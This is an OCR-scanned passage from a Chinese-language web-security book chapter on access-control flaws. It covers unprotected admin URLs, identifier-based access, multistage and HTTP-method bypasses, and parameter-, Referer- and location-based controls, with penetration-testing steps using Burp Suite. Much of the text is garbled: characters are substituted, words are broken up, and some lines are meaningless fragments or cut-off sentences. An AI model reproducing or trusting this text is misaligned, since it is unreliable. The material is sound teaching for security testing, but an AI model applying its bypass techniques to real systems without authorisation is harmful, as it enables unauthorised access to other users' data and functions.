尸 在 特定 时 刻 壬 试 对 资源 执行 的 每 一 项 操作 执行 访问 控制 检查 。 而 
A, 与 许多 其 他 类 型 的 控制 不 同 ， 这 一 设计 决策 需要 由 人 做 出 ， 而 无 
法 采用 技术 来 解决 。 

访问 控制 漏洞 的 概念 非常 简单 :应 用 程序 允许 攻击 者 执行 某 种 攻 
击 者 没有 资格 执行 的 操作 。 各 种 漏洞 之 间 的 差异 实际 上 可 归结 为 这 些 
核心 漏洞 表现 方式 上 的 不 同 ， 以 及 检测 它们 所 需要 使 用 的 技巧 之 间 的 
差异 。 我 们 将 描述 所 有 这 些 技巧 ， 讨 论 如 何 利 用 应 用 程序 的 各 种 不 同 
行为 ， 执 行 未 授权 操作 并 访问 受 保护 的 数据 。 


访问 控制 可 分 为 三 大 类 : 垂直 访问 控制 、 水 平 访问 控制 和 上 下 文 
相关 的 访问 控制 。 

王 直 访问 控制 允许 各 种 类 型 的 用 户 访问 应 用 程序 的 不 同 功能 。 在 
最 简单 的 情况 下 ， 应 用 程序 通过 这 种 控制 界定 普通 用 户 和 管理 员 。 在 
更 加 复杂 的 情况 下 ， 垂 直 访 问 控制 可 能 需要 界定 允许 其 访问 特殊 功能 
RR 
te $ 

水 平 访问 控制 允许 用 户 访问 一 组 相同 类 型 的 、 内 容 极其 广泛 的 货 
源 。 例 如 ，Web 邮 件 应 用 程序 允许 访问 自己 而 非 他 人 的 电子 邮件 ; 电 
子 银行 只 允许 转移 目 己 账 户 内 的 资金 ， 工 作 流 程 应 用 程序 允许 更 新 分 
配给 你 的 任务 ， 但 只 能 阅读 分 配给 他 人 的 任务 。 

上 下 文 相关 的 访问 控制 可 确保 基于 应 用 程序 当前 的 状态 ， 将 用 户 
访问 仅 限 于 所 允许 的 内 容 。 例 如 ， 如 采 在 某 个 过 程 中 ， 用 户 需要 完成 
多 个 阶段 的 操作 ， 上 下 文 相关 的 访问 控制 可 以 防止 用 户 不 按 规 定 的 顺 
序 访问 这 些 阶 段 。 

许多 时 候 ， 垂 直 与 水 平 访问 控制 相互 交合。 例如 ， 企 业 资 源 规划 
应 用 程序 允许 每 个 应 付 账 会 计 文 员 文 付 某 一 个 组 织 单元 、 而 非 其 他 单 
元 的 发 票 ， 但 允许 应 付 账 经 理 文 付 任何 单元 的 发 票 。 同 样 ， 会 计 文 员 
只 能 文 付 小 额 发 票 ， 而 大 和 额 文 票 必须 由 经 理 文 付 。 财 务 总 监 可 以 查看 
公司 每 个 组 织 单元 的 发 票 文 付 和 收据 ， 但 不 得 文 付 任何 发 票 。 

如 有 果 用 户 能 够 访问 他 无 权 访 问 的 功能 或 资源 ， 束 表示 访问 控制 存 
在 缺陷 。 主 要 有 三 种 类 型 的 以 访问 控制 为 目标 的 攻击 ， 分 别 与 三 种 访 
问 控制 相对 应 。 

口 如 采 一 名 用 户 能 够 执行 某 项 功能 ， 但 分 配给 他 的 角色 并 不 具有 
这 种 权限 ， 就 表示 出 现 垂直 权限 提升 漏洞 。 例 如 ， 如 采 一 名 普通 用 户 
能 够 执行 管理 功能 ， 或 者 一 位 会 计 文 员 能 够 文 付 任何 金额 的 发 票 ， 丈 
表示 访问 控制 并 不 完善 

口 如 末 一 名 用 户 能 够 查看 或 修改 他 没有 资格 查看 或 修改 的 资源 ， 
就 表示 出 现 水 平权 限 提 升 漏洞 。 例 如 ， 如 果 用 户 能 使 用 web 邮件 应 用 
程序 阅读 他 人 的 电子 邮件 ， 或 者 如 果 一 位 会 计 文 员 可 以 处 理 目 己 所 属 
组 织 单元 以 外 的 单元 的 发 票 ， 那 么 访问 控制 也 不 完善 。 


口 如 采用 户 可 以 利用 应 用 程序 状态 机 中 的 漏洞 获得 关键 帝 源 的 访 
问 权 限 ， 就 表示 出 现 业务 逻辑 漏洞 。 例 如 ， 用 户 能 够 避 开 购物 结算 序 
列 中 的 文 付 步骤 。 

许多 时 候 ， 应 用 程序 水 平权 限 划 分 中 存在 的 漏洞 可 能 会 立即 引起 
垂直 权限 提升 攻击 。 例 如 ， 如 果 一 名 用 户 能 够 以 某 种 方式 设置 其 他 用 
尸 的 密码 ， 那 么 该 用 户 就 能 攻击 管理 员 的 账户 并 控制 整个 应 用 程序 。 

在 我 们 已 经 描述 的 示例 中 ， 不 完善 的 访问 控制 使 获得 某 种 用 户 权 
限 的 攻击 者 能 够 执行 未 授权 操作 或 访问 未 授权 数据 。 但 是 ， 在 最 普 重 
的 情况 下 ， 不 完善 的 访问 控制 可 能 允许 完全 未 获 授 权 的 用 户 访问 只 
特权 用 户 才能 访问 的 功能 或 数据 。 


8.1.1 完全 不 受 保护 的 功能 


在 许多 的 访问 控制 不 完善 情况 下 ， 敏 感 功能 和 数据 可 被 任何 知道 
相关 URL 的 用 户 访 问 。 例 如 ， 在 许多 应 用 程序 中 ， 任 何人 只 需 访问 一 
个 特定 的 URL 束 能 够 完全 控制 它 的 管理 功能 : 


https: //wahh-app.com/admin/ 


AEA T, MAIE E E SE ET Pa a all. 以 管理 员 身 
份 登 录 的 用 户 在 他 们 的 用 户 界 面 上 看 到 一 个 该 URL 的 链接 ， 而 其 他 用 
户 则 无 法 看 到 这 个 链接 。 这 种 细微 的 差别 是 应 用 程序 用 于 “防止 "敏感 
功能 被 未 授权 使 用 的 唯一 机 制 。 

有 时 候 ， 人 允许 用 户 访问 强大 功能 的 URL 可 能 很 难 猜测 ， 甚 至 可 能 
相当 隐秘 ， 例 如 : 


https: //wahh-app.com/menus/secure/ f£457/DoAdminMenu2 .jsp 


这 种 情况 下 ， 开 发 者 假设 攻击 者 无 法 知道 或 发 现 这 个 URL， 管 理 
功能 束 会 因此 受到 保护 。 当 然 ， 局 外 人 很 难 攻 破 一 个 应 用 程序 ， 因 为 
他 们 不 太 可 能 猜测 出 实现 这 种 目的 的 URL e 


号 错误 观点 “ 低 权 限 用 户 并 不 知道 那个 URL。 我 们 并 没有 在 


应 用 程序 中 引用 它 。” 
在 前 面 的 示例 中 ， 无 论 URL 多 么 容易 猜测 ， 不 存在 任何 真 


正 的 访问 控制 仍然 等 同 于 一 个 严重 的 漏洞 。 不 管 十 在 应 用 程序 


还 是 在 用 户 手 中 ，URL 都 不 具有 保密 性 。 它 们 显示 在 屏幕 上 ， 
出 现在 浏览 絮 历 史记 录 与 Web 服 务 俐 和 代理 服务 器 的 日 志 中 。 
用 户 可 能 会 记 下 它们 ， 以 它们 为 书签 或 通过 电子 邮件 将 其 四 处 


传播 。 与 密码 不 同 ， 它 们 一 般 不 需要 定期 修改 。 当 用 户 的 工作 
职位 发 生 改 变 、 需 要 收回 他 们 的 管理 权限 时 ， 我 们 并 没有 办 法 
从 他 们 的 记忆 中 删除 茶 个 特殊 的 URL。 


一 些 应 用 程序 的 敏感 功能 隐 沁 在 各 种 不 太 容 易 猜 测 的 URL 之 后 ， 
但 攻击 者 通过 仔细 检查 客户 端 代 码 仍 能 发 现 这 些 URL。 许 多 应 用 程序 
使 用 JavaScript 在 客户 端 动态 建立 用 户 界面 。 它 一 般 建 立 各 种 与 用 户 状 
T 然后 根据 这 些 标 记 在 用 户 界面 (UI 中 增加 不 同 的 元 
ZA o UN: 


var isAdmin = false; 
if (isAdmin) 
adminMenu.addItem("/menus/secure/ff£457/addNewPortalUser2.jsp", 
“create a new user"); 


} 


在 这 个 示例 中 ， 攻 击 者 只 需 检查 JavaScript 代 码 就 可 确定 具备 管理 
功能 的 URL， 并 尝试 访问 它们 。 在 其 他 情况 下 ，HTML 注 释 中 可 能 包 
含 屏 幕 显示 内 容 中 没有 链接 的 UREL 的 引用 或 线索 。 请 参阅 第 4 章 了 解 攻 
击 者 收集 应 用 程序 中 隐藏 内 容 信息 时 使 用 的 各 种 技巧 。 

直接 访问 方法 

如 果 应 用 程序 披露 实际 用 于 远程 调用 API 方 法 的 URL 或 参数 ( 通 
常 它 们 由 Java 界 面 披露 ) ， 这 时 可 能 出 现 功能 不 受 保护 的 特例 。 在 将 
服务 器 端 代码 移 至 浏览 右 扩 展 组 件 ， 并 创建 方法 存根 以 便 代 码 仍然 能 
够 调用 它 正 常 运行 所 需 的 服务 器 端 方法 时 ， 往 往 会 发 生 这 种 特例 。 除 
以 上 情形 外 ， 如 果 UREL 或 参数 使 用 getBalance 和 isExpired 等 标准 Java 命 
名 约定 ， 这 时 也 可 能 会 出 现 直 接 调 用 方法 的 情况 。 

原则 上 ， 与 指定 服务 器 端 脚本 或 其 他 资源 的 请 求 相 比 ， 并 不 需要 
完全 确保 指定 要 执行 的 服务 器 端 API 的 请 求 的 安全 。 但 实际 上 ， 这 种 
机 制 往往 包 仿 漏洞。 通常， 客户 端 直接 与 服务 器 端 API 方 法 交互 ， 并 
避 开 应 用 程序 的 正常 访问 控制 或 意外 输入 同 量 。 如 果 其 他 功能 从 不 由 
Web 应 用 程序 客户 端 直接 调用 ， 则 这 些 功 能 也 可 以 通过 上 壕 方 法 调 
用 ， 并 不 受 任 何 控制 的 保护 。 一 般 情 况 下 ， 用 户 只 需要 能 够 访问 某 些 


特定 的 方法 ， 但 他 们 却 拥有 访问 所 有 方法 的 权限 。 出 现 这 种 情况 ， 或 
者 是 因为 开发 者 并 不 了 解 用 户 到 撒 需 要 哪些 方法 ， 因 而 向 他 们 提供 所 
有 方法 的 访问 权限 ;或 者 是 因为 将 用 户 映 射 到 HTTP 服 务 右 的 API 默 认 
提供 访问 所 有 方法 的 权限 。 

以 下 示例 显示 了 如 何 从 接口 securityCheck 中 调用 
getCurrentUserRoles 方 法 : 


http: //wahh-app.com/public/securityCheck/getCurrentUserRoles 


在 此 示例 中 ， 除 了 测试 对 getCurrentUserRoles 方 法 的 访问 控制 外 ， 
还 应 检查 是 否 存在 其 他 类 似 命 名 的 方法 ， 如 getAllUserRoles ` 
getAllRoles、getAllUsers 和 getCurrentUserPermissions。 我 们 将 在 本 章 
后 面部 分 进一步 讨论 如 何 测 试 直接 访问 方法 的 情况 。 


8.1.2 ”基于 标识 符 的 功能 


当 应 用 程序 使 用 一 项 功能 访问 茶 个 特殊 的 资源 时 ， 被 请 求 资 源 的 
标识 符 常 常 以 请 求 参 数 的 形式 、 在 URL 查 询 字 符 串 或 POST 请 求 主体 中 
提交 给 服务 器 。 例 如 ， 应 用 程序 可 能 使 用 下 面 的 URL 显 示 一 份 属 于 茶 
个 用 户 的 特殊 文档 : 


attps://wahh-app.com/ViewDocument .che?decid=12#0149120 
拥有 这 份 文档 的 用 户 登 录 后 ， 这 个 URL 的 链接 将 会 在 该 用 户 的 我 
的 文档 ”页 面 显示 。 其 他 用 户 无 法 看 到 这 个 链接 。 但 是 ， 如 采访 问 控制 


那么 请 求 相 应 URL 的 任何 用 户 都 能 够 像 授 权 用 户 那样 得 看 这 
HA” 


YV ”提示 当主 应 用 程序 连接 一 个 外 部 系统 或 后 端 组 件 时 通常 


会 出 现 这 类 漏洞 。 可 能 很 难 在 使 用 各 种 技术 的 不 同系 统 之 间 共 至 一 
个 基于 会 话 的 安全 模型 。 面 对 这 种 问题 ， 开 发 者 往往 会 避免 使 用 那 
种 模型 ， 而 使 用 客户 端 提 区 的 参数 做 出 访问 控制 决定 。 


在 这 个 示例 中 ， 寻 求 获得 未 授权 访问 的 攻击 者 不 仅 需 要 知道 应 用 
程序 页 面 的 名 称 (View-Document.php) ， 而 且 需 要 知道 他 想 要 查看 的 


文档 的 标识 符 。 有 时 ， 应 用 程序 后 成 的 资源 标识 符 非 常 难以 预测 ， 例 
如 ， 它 们 可 能 是 随机 选择 的 GUID (Global Unique Identifier， 全 局 统一 
标识 符 ) 。 在 其 他 情况 下 ， 它 们 可 能 很 容易 猜测 ， 例 如 ， 它 们 可 能 是 
连续 生成 的 数字 。 但 是 ， 无 论 是 哪 一 种 情况 ， 应 用 程序 都 易于 遭受 攻 
击 。 如 前 所 述 ，UREL 并 不 具有 保密 性 ， 资 源 标识 符 也 同样 如 此 。 通 
常 ， 硕 望 发 现 其 他 用 户 资源 标识 符 的 攻击 者 可 在 应 用 程序 的 某 个 位 置 
找到 这 些 信息 ， 例 如 访问 日 志 中 。 即 使 在 应 用 程序 的 资源 标识 符 很 难 
猜测 的 情况 下 ， 如 果 没 有 对 那些 资源 实施 合理 的 访问 控制 ， 它 们 仍然 
易于 受到 攻击 。 如 果 标 识 符 很 容易 预测 ， 问 题 就 会 更 加 严重 ， 也 更 容 
易 被 攻击 者 所 利用 。 


YV 提示 应 用 程序 日 志 通 常 是 一 个 信息 金 矿 ， 其 中 包含 大 量 
可 被 用 作 标 识 符 的 数据 项 ， 可 利用 它们 探查 通过 标识 符 访 问 的 功 
能 。 应 用 程序 日 志 中 常见 的 标识 符 包 括 : 用 户 名 、 用 户 ID、 账 号 、 
文档 ID、 用 户 群 组 与 角色 以 及 电子 邮件 地 址 。 


SO/ 注解 ” 除 用 于 指 代 应 用 程序 中 基于 数据 的 资源 外 ， 这 种 标 


识 符 还 第 用 于 表示 应 用 程序 功能 。 如 第 4 草 所 述 ， 应 用 程序 可 以 通 
过 单独 一 个 页 面 提供 各 种 功能 ， 它 接受 一 个 功能 名 称 或 标识 符 为 参 
数 。 同 样 ， 在 这 种 情况 下 ， 应 用 程序 也 只 有 是 在 各 种 类 型 的 用 户 界面 
中 显示 或 隐藏 一 个 特殊 的 URL， 实 施 肤浅 的 访问 控制 。 如 果 攻 击 者 
能 够 确定 某 一 敏感 功能 的 标识 答 ， 他 束 能 像 拥 有 高 级 权限 的 用 户 一 
样 访问 该 功能 。 


8.1.3 功能 


应 用 程序 的 许多 功能 通过 几 个 阶段 执行 ， 并 在 执行 过 程 中 由 客户 
端 癌 服务 器 发 送 许多 请 求 。 例 如 ， 添 加 新 用 户 功 能 可 能 包括 从 用 户 维 
护 某 单 中 选取 这 个 选项 ， 从 下 拉 列 表 中 选择 部 门 和 用 户 职 位 ， 然 后 输 
入 新 用 户 名 、 初 始 冤 码 和 其 他 信息 。 


许多 应 用 程序 常 肖 会 努力 防止 这 种 敏感 功能 被 未 授权 访问 ， 但 由 
于 其 误解 了 这 种 功能 的 使 用 方式 ， 因 而 实施 了 不 完善 的 访问 控制 。 

在 前 面 的 示例 中 ， 如 果 一 名 用 户 话 图 加 载 用 户 维 护 染 单 并 从 中 选 
取 “ 添 加 新 用 户 ” 选 项 ， 应 用 程序 束 会 核实 该 用 户 十 否 拥有 必要 的 权 
限 ， 如 采用 户 未 获 授 权 ， 就 阻止 其 进行 访问 。 但 是 ， 如 采 攻 击 者 直接 
进入 核实 用 户 所 属 部 门 和 其 他 细节 的 阶段 ， 可 能 吏 没 有 有 效 的 访问 控 
制 对 其 加 以 限制 。 开 发 者 认为 ， 任 何 到 达 验 证 过 程 后 续 阶 段 的 用 户 一 
定 已 经 拥有 相关 的 权限 ， 因 为 前 面 的 阶段 已 经 验证 了 这 些 权 限 。 通 过 
这 种 方法 ， 任 何 应 用 程序 用 户 都 能 够 添加 一 个 痢 的 管理 用 户 账户 ， 因 
Re i 0 
功能 。 

即使 在 许多 电子 银行 使 用 的 安全 性 能 很 关键 的 Web 应 用 程序 中 ， 
我 们 也 曾经 发 现 这 种 类 型 的 漏洞 。 在 银行 应 用 程序 中 ， 转 账 通 常 包括 
几 个 阶段 ， 部 分 原因 是 为 了 防止 用 户 在 请 求 转 账 时 无 意 出 错 。 这 个 多 
阶段 过 程 需 要 在 每 个 阶段 收集 各 种 与 用 户 有 关 的 数据 。 这 些 数 据 在 初 
次 提交 后 将 接受 严格 检查 ， 然 后 使 用 HTML 表 单子 段 送 交 给 随后 的 阶 
段 。 但 十， 如 果 应 用 程序 并 不 在 最 后 阶段 重新 确认 这 些 数 据 ， 攻 击 考 
束 可 能 会 避 开 服务 器 检查 。 例 如 ， 应 用 程序 可 能 会 核实 进行 转账 的 来 
源 账户 是 否 属 于 当前 用 户 ， 然 后 询问 与 目的 账户 有 关 的 细节 和 转账 的 
金额 。 如 果 用 户 拦 截 这 个 过 程 中 的 最 后 一 个 POST 请 求 ， 并 修改 来 源 账 
号 ， 他 就 能 实现 水 平权 限 提 升 ， 从 其 他 用 户 的 账户 中 转移 资金 。 


8.1.4 BRACE 


在 绝 大 多 数 情况 下 ， 用 户 都 是 通过 回 在 服务 硕 上 执行 的 动态 页 面 
发 布 请 求 来 访问 受 保 护 的 功能 和 资产。 这 时 ， 每 个 动态 页 面 负责 执行 
适当 的 访问 控制 检查 ， 并 确认 用 户 拥有 执行 相关 操作 所 需 的 权限 。 

但 是 ， 有 些 时 候 ， 用 户 会 直接 向 位 于 服务 器 Web 根 目录 下 的 静态 
资源 提出 请 求 ， 要 求 访问 这 些 受 保护 的 资源 。 例 如 ， 一 个 在 线 出 版 商 
允许 用 户 浏 览 他 的 书籍 目录 并 购买 电子 书 进行 下 载 。 文 付费 用 后 ， 应 
用 程序 吕 3 将 用 户 指 癌 以 下 下 载 URL: 


https://wahh-books.com/download/9780636628104 .pdf 


因为 这 是 一 个 完全 静态 的 资源 ， 所 以 它 并 不 在 服务 右上 运行 ， 它 
的 内 容 直 接 由 Web 服 务 右 返回 。 因 此 ， 资 源 目 身 并 不 能 执行 任何 检查 


以 确认 提出 请 求 的 用 户 拥 有 必要 的 权限 。 如 采 可 以 通过 这 种 方式 访问 
静态 资源 ， 那 么 这 些 资 源 很 可 能 没有 受到 有 效 的 访问 控制 机 制 的 保 
护 ， 任 何 知 晓 URL 命 名 方案 的 人 都 可 以 利用 这 种 缺陷 访问 任何 所 需 的 
资源 。 在 上 面 的 示例 中 ， 文 档 名 称 似乎 是 一 个 ISBN， 利 用 这 个 信息 ， 
攻击 者 能 够 任意 下 载 由 该 出 版 商 制作 的 每 一 本 电子 书 。 

某 些 功 能 特别 容易 出 现 这 种 问题 ， 包 括 提 供 公司 年 度 报表 之 类 静 
人 态 文档 的 金融 Web 站 点 、 提 供 可 下 载 二 进 制 代码 的 软件 供应 商 以 及 通 
过 其 访问 应 用 程序 中 静态 日 志文 件 和 其 他 敏感 数据 的 管理 功能 。 


8.1.5 “平台 配置 错误 


一 些 应 用 程序 在 Web 服 务 器 或 应 用 程序 平台 层 使 用 控件 来 控制 访 
问 。 通 常 ， 应 用 程序 会 根据 用 户 的 角色 来 限制 对 特定 URL 路 径 的 访 
问 。 例 如 ， 如 果 用 户 不 属于 “管理 员 ” 组 ， 访 问 /admin 路 径 的 请 求 可 能 
会 遭 到 拒绝 。 原 则 上 ， 这 是 完全 合法 的 访问 控制 方法 。 但 是 ， 如 果 在 
配置 平台 级 控件 时 出 现 错误 ， 这 时 就 可 能 导致 未 授权 访问 。 

正常 情况 下 ， 平 台 级 配置 与 防火 墙 策略 规则 类 似 ， 它 们 基于 以 下 
条 件 允 许 或 拒绝 访问 请 求 : 

口 HTTP 请 求 方法 ; 

DURL 路 径 ; 

口 用 户 角 色 。 

如 第 3 章 所 述 ，GET 方 法 的 最 初 目 的 是 检索 信息 ， 而 POST 方法 的 
目的 是 执行 更 改 应 用 程序 的 数据 或 状态 的 操作 。 

如 果 没 有 小 心 制定 规则 ， 以 基于 正确 的 HITP 方 法 和 URL 路 径 允 许 
访问 ， 就 可 能 会 导致 未 授权 访问 。 例 如 ， 如 果 用 于 创建 新 用 户 的 管理 
功能 使 用 POST 方法 ， 平 台 可 能 具有 禁止 POST 方法 并 人 允许 所 有 其 他 方 
法 的 拒绝 规则 。 但 是 ， 如 果 应 用 程序 级 脚本 并 不 验证 针对 此 功能 的 所 
有 请 求 是 否 使 用 POST 方 法 ， 则 攻击 者 就 可 以 通过 使 用 GET 方 法 提交 同 
一 请 求 来 避 开 这 种 控制 。 由 于 大 多 数 用 于 检索 请 求 参数 的 应 用 程序 级 
API 对 于 请 求 方法 并 无 限制 ， 因 此 ， 攻 击 者 只 需要 在 GET 请 求 的 URL 
查询 字符 串 中 提供 所 需 参 数 ， 就 可 以 未 授权 使 用 上 述 功 能 。 

令 人 更 加 惊奇 的 是 ， 即 使 平台 级 规则 拒绝 访问 GET 和 POST 方 法 ， 
应 用 程序 仍 有 可 能 易于 受到 攻击 。 这 是 因为 ， 使 用 其 他 HTTP 方 法 的 请 
求 可 能 最 终 由 处 理 GET 和 POST 请 求 的 相同 应 用 程序 代码 来 处 理 。 
HEAD 方 法 就 是 一 个 典型 的 例子 。 根 据 规范 ， 服 务 器 应 使 用 它们 用 于 
响应 对 应 的 GET 请 求 的 相同 消息 头 (但 不 包含 消息 主体 ) 来 响应 


HEAD 请 求 。 因 此 ， 大 多 数 平台 都 能 够 正确 处 理 HEAD 请 求 ， 即 执行 
对 应 的 GET 处 理 程序 并 返回 生成 的 HTTP 消 息 头 。 通 常 ，GET 请 求 可 用 
于 执行 敏感 操作 ， 这 或 者 是 因为 应 用 程序 本 身 将 GET 请 求 用 于 这 一 目 
的 (与 规范 不 符 ) ， 或 者 是 因为 它 并 不 验证 是 否 使 用 了 POST 方法 。 如 
果 攻 击 者 能 够 使 用 HEAD 请 求 增加 一 个 管理 用 户 账户 ， 那 么 ， 即 使 在 
请 求 中 未 收 到 任何 消息 主体 ， 他 仍然 能 够 成 功 实施 攻击 。 

某 些 情况 下 ， 对 于 使 用 无 法 识别 的 HTTP 方 法 的 请 求 ， 平 台 会 直接 
将 它们 交 由 GET 请 求 处 理 程序 处 理 。 在 这 种 情况 下 ， 通 过 在 请 求 中 指 
0 
台 级 控制 。 

2 0 
一 个 特例 。 


8.1.6 访问 控制 方法 不 安全 


一 些 应 用 程序 使 用 一 种 极其 不 安全 的 访问 控制 模型 ， 基 于 客户 端 
提交 的 请 求 参数 或 受 攻击 者 控制 的 其 他 条 件 做 出 访问 控制 决定 。 
1. 基于 参数 的 访问 控制 

在 一 些 这 种 模型 中 ， 应 用 程序 在 用 户 登 录 时 决定 用 户 的 角色 或 访 
问 级 别 ， 并 在 登录 后 通过 隐 关 表单 字段 、cookie 或 者 预 完 设 定 的 查询 
字符 串 参 数 (参阅 第 5 章 了 解 相关 内 容 ) 由 客户 端 传送 这 些 信息 。 应 用 
ge ee 
9 访问 级 别 。 

例如 ， 使 用 应 用 程序 的 管理 员 将 看 到 以 下 URL: 


https://wahh-app.com/login/home.jsp?admin=true 


但 普通 用 户 看 到 的 URL 中 包含 一 个 不 同 的 参数 ， 或 者 根本 不 包含 任何 
参数 。 任 何 知 道 分 配给 管理 员 的 参数 的 用 户 只 需 在 他 自己 的 请 求 中 使 
用 这 个 参数 ， 就 可 以 访问 管理 功能 。 

有 了 时候， 如 果 不 以 高 级 权限 用 户 的 身份 实际 使 用 应 用 程序 ， 并 确 
定 在 使 用 过 程 中 提出 了 哪些 请 求 ， 这 种 类 型 的 访问 控制 可 能 很 难 探测 
出 来 。 作 为 普通 用 户 ， 我 们 可 以 使 用 在 第 4 章 讨 论 的 如 何 发 现 隐藏 请 
求 参数 的 技巧 成 功 查 明 这 种 机 制 。 
2. 基于 Referer 的 访问 控制 


在 其 他 不 安全 的 访问 控制 模型 中 ， 应 用 程序 使 用 HTTP Referer 消 
息 头 做 出 访问 控制 决定 。 例 如 ， 应 用 程序 可 能 会 根据 用 户 的 权限 ， 严 
格 控制 用 户 访问 主 维护 菜单 。 但 是 ， 如 果 某 名 用 户 提 出 请 求 ， 要 求 访 
问 某 项 管理 功能 ， 应 用 程序 可 能 只 是 检查 该 请 求 是 否 由 管理 荣 单 页 面 
提出 ， 如 果 确 实 由 该 页 面 提出 ， 即 认为 该 用 户 一 定 已 经 访问 过 那个 页 
面 ， 并 因此 已 经 拥有 了 必要 的 权限 。 当 然 ， 从 本 质 上 讲 ， 这 种 模型 并 
不 安全 ， 因 为 Referer 消 息 头 完全 由 用 户 控制 ， 并 可 设 定 为 任何 值 。 
3. 基于 位 置 的 访问 控制 

许多 公司 都 具有 管理 或 业务 要 求 ， 根 据 用 户 的 地 理 位 置 限制 对 资 
源 的 访问 。 这 些 公司 不 仅 包 括 金融 机 构 ， 还 包括 新 闻 服 务 及 其 他 部 
门 。 在 这 些 情 况 下 ， 公 司 会 采用 各 种 方法 来 确定 用 户 的 位 置 ， 其 中 最 
党 用 的 是 用 户 当 前 IP 地 址 的 地 理 位 置 。 
攻击 者 能 够 轻易 突破 基于 位 置 的 访问 控制 。 以 下 是 一 些 常 用 的 方 
YE: 

o HATE OLS Web tE ae; 

口 使 用 在 所 需 位 置 终 止 的 VPN; 

口 使 用 支持 数据 漫游 的 移动 设备 ; 

口 直接 修改 客户 端 用 于 确定 地 理 位 置 的 机 制 。 


8.2 Y| 


在 开始 探查 应 用 程序 、 检 测 任 何 实际 的 访问 控制 漏洞 之 前 ， 渗 透 
测试 员 应 该 花 一 些 时 间 检 查 解 析 应 用 程序 过 程 中 得 到 的 结果 (请 参阅 
第 4 章 了 解 相 关内 容 ) ， 了 解 应 用 程序 在 访问 控制 方面 的 实际 要 求 ， 从 
而 决定 探查 哪些 内 容 可 以 得 到 最 令 人 满意 的 结果 。 


渗透 测试 步骤 


在 分 析 应 用 程序 的 访问 控制 机 制 时 ， 需 要 考虑 以 下 问题 。 
(1) 应 用 程序 的 功能 是 否 允 许 用 户 访问 属于 他 们 的 特定 数 


据 ? 

(2) 是 否 存在 各 种 级 别 的 用 户 ， 如 经 理 、 主 管 、 贵 
否 允 许 他 们 访问 不 同 的 功能 ? 

(3) 管理 员 是 否 使 用 内 置 在 相同 应 用 程序 中 、 以 对 其 进行 配 
置 和 监控 的 功能 ? 

(4) 发 现 应 用 程序 的 哪些 功能 或 数据 资源 最 有 可 能 帮助 攻击 
者 提升 当前 的 权限 ? 
” (5) 是 否 存在 任何 标识 符 (以 POST 消 息 体 的 URL 参 数 的 方 
TO 表明 正 使 用 某 一 参数 追踪 访问 控制 级 别 ? 


8.2.1 ”使 用 不 同 用 户 账户 进行 测试 


测 弃 应 用 程序 的 访问 控制 效率 的 最 简单 、 最 有 效 的 方法 ， 是 使 用 
其 他 账户 访问 应 用 程序 。 这 样 你 束 可 以 确定 ， 可 由 一 个 账户 合法 访问 
的 资源 和 功能 是 否 能 够 由 男 一 个 账户 非法 访问 。 


渗透 测试 步骤 


(1) 如 果 应 用 程序 隅 离 用 户 对 不 同 级 别 的 功能 的 访问 ， 可 以 
目 完 使 用 一 个 权限 较 高 的 账户 确定 所 有 可 用 的 功能 ， 然 后 使 用 权限 
较 低 的 账户 访问 这 些 功能 ， 测 试 能 否 垂直 提升 权限 。 


(2) 如果 应 用 程序 隔离 用 户 对 不 同 资源 〈 如 文档 ) 的 访问 ， 
可 以 使 用 两 个 不 同 的 用 户 级 账户 测试 访问 控制 是 否 有 效 ， 或 者 是 否 
可 以 水 平 提升 权限 。 例 如 ， 找 到 一 个 一 名 用 户 可 以 合法 访问 ， 但 另 
一 名 用 户 不 能 合法 访问 的 文档 ， 然 后 竹 试 使 用 第 二 名 用 户 的 账户 访 
问 该 文档 一 一 通过 请 求 相关 URL 或 在 第 二 名 用 户 的 会 话 中 提交 同样 
的 POST 参 数 。 


对 应 用 程序 的 访问 控制 进行 彻底 测试 需要 耗费 大 量 时 间 。 符 运 的 
征 ， 一 些 工具 可 以 帮助 你 目 动 完成 某 些 工作 ， 以 提高 测试 速度 和 可 徘 
0 
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借助 Burp Suite， 可 以 使 用 两 个 不 同 的 用 户 账户 来 解析 应 用 程序 的 
内 容 。 然 后 ， 可 以 比较 每 一 名 用 户 访 问 的 内 容 到 底 存 在 哪些 差异 。 


渗透 测试 步骤 


(1) 将 Burp 配 置 为 代理 服务 器 并 禁用 拦截 ， 以 一 个 用 户 账户 
浏览 应 用 程序 的 所 有 内 容 。 如 果 要 测试 垂直 访问 控制 ， 则 使 用 权限 
较 高 的 账户 。 

(2) 检查 Burp 的 站 点 地 图 的 内 容 ， 确 保 已 确定 要 测试 的 所 有 
功能 。 然 后 使 用 上 下 文 菜单 选择 “比较 站 点 地 图 ”(\compare site 
maps) 功能 。 

(3) 要 选择 第 二 个 进行 比较 的 站 点 地 图 ， 可 以 从 Burp 状 态 文 
件 中 加 载 该 地 图 ， 或 让 Burp 在 新 会 话 中 动态 重新 请 求 第 一 个 站 点 地 
。 要 测试 同一 类 型 的 用 户 之 间 的 水 平 访问 控制 ， 只 需 加 载 以 前 保 
存 的 、 已 将 应 用 程序 映射 为 其 他 用 户 的 状态 文件 。 要 测试 垂直 访问 
控制 ， 最 好 是 以 低 权 限 用户 喘 份 重 新 请 求 高 权限 站 点 地 图 ， 因 为 这 
样 可 确保 完全 涵盖 相关 的 功能 。 

(4) 要 在 不 同 的 会 话 中 重新 请 求 第 一 个 站 点 地 图 ， 需 要 使 用 
低 权 限 用 户 会 话 的 详细 资料 配置 Burp 的 会 话 处 理 功 能 (例如 ， 通 过 
记录 一 个 登录 宏 或 提供 要 在 请 求 中 使 用 的 特定 cookie) 。 我 们 将 在 
第 14 章 中 详细 讨论 此 功能 。 还 可 能 需要 定义 适当 的 范围 规则 ， 以 防 
止 Burp 请 求 任 何 注销 功能 。 


图 8-1 显 示 了 一 次 位 单 站 点 地 图 比较 的 结果 。 其 中 的 深 色 部 分 是 站 
点 地 图 之 间 差 异 分 析 的 结果 ， 这 些 部 分 显示 了 两 个 地 图 之 间 已 添加 、 
删除 或 修改 的 项 目 。 对 于 已 修改 的 项 目 ， 该 表格 提供 了 一 个 “diff 
count” 列 ， 其 中 列 出 了 将 第 一 个 地 图 中 的 项 目 修改 为 第 二 个 地 图 中 的 
项 目 所 需 的 编辑 次 数 。 而 且 ， 如 有 果 远 中 一 个 项 目 ， 其 啊 应 也 以 深 色 显 
示 ， 以 显示 那些 编辑 在 啊 应 中 的 位 置 。 


| mac showing as seme ur THREE WR i r :ee 


图 8-1 显示 以 不 同 用 户 账户 访问 的 内 容 之 间 的 差异 的 站 点 地 图 比较 


解释 站 点 地 图 比较 的 结果 需要 一 定 的 智慧 ， 并 需要 了 解 特定 应 用 
